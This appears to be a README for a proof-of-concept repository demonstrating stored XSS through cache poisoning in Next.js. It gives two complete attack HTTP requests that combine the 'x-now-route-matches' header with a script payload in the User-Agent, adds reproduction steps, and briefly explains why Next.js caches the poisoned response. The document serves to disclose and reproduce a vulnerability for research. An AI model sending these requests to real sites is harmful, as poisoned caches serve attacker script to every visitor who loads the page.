Getting Started

1. Install Node.js LTS
2. npm install
3. npm run build
4. npm run start

Exploitation 1: Stored XSS via Cache Poisoning

1. Send the following HTTP request (Attack Request) using any HTTP client.

GET /poc?__nextDataReq=1 HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1

2. Visit http://localhost:3000 (Normal Request) using any Web Browser.

Exploitation 2: Stored XSS via Cache Poisoning

1. Send the following HTTP request (Attack Request) using any HTTP client, make sure to replace "UiKoKFFGnF1td3mMyeDX5" with your ".next/BUILD_ID"

GET /_next/data/UiKoKFFGnF1td3mMyeDX5/poc.json HTTP/1.1
Host: localhost:3000
User-Agent: <script>alert('XSS')</script>
x-now-route-matches: 1

2. Visit http://localhost:3000 (Normal Request) using any Web Browser.

How does it work ?

1. x-now-route-matches is a custom HTTP header recognized by Next.js. When present, Next.js will treat the HTTP Request as "SSG" (Static Site Generation), which the HTTP Response can be cached (Cache-Control: s-maxage=1, stale-while-revalidate).

2. ?__nextDataReq=1 is a querystring recognized by Next.js. When present, Next.js will treat the HTTP Request as "Retrieving __NEXT_DATA__".

Full writeup can be found in Credit section

Credit

• https://zhero-web-sec.github.io/research-and-things/nextjs-cache-and-chains-the-stale-elixir